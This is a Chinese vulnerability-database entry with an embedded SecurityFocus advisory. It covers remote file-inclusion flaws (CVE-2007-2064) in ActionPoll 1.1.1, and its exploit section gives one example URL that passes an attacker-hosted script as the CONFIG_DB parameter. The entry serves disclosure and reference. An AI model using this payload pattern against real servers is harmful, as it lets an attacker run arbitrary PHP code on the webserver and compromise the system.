Actionpoll 'Actionpoll.PHP' 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111421 漏洞类型 输入验证
发布时间 2006-10-30 更新时间 2007-04-18
CVE编号 CVE-2007-2064 CNNVD-ID CNNVD-200704-300
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28871
https://cxsecurity.com/issue/WLB-2007040094
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-300
|漏洞详情
RobertLadstaetterActionPoll存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到actionpoll.php的(1)CONFIG_POLLDB参数或到db/DataReaderWriter.php的(2)CONFIG_DB参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20788/info

Actionpoll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

Version 1.1.1 is reported affected; other versions may be affected as well.

http://www.example.com/db/DataReaderWriter.php?CONFIG_DB=evilscripts?
|参考资料

来源:BID
名称:20788
链接:http://www.securityfocus.com/bid/20788
来源:BID
名称:23504
链接:http://www.securityfocus.com/bid/23504
来源:BUGTRAQ
名称:20070415ActionPollScript(actionpoll.php)RemoteFileInclude//starhack.org
链接:http://www.securityfocus.com/archive/1/archive/1/465871/100/0/threaded
来源:XF
名称:actionpoll-multiple-file-include(33691)
链接:http://xforce.iss.net/xforce/xfdb/33691
来源:SREASON
名称:2587
链接:http://securityreason.com/securityalert/2587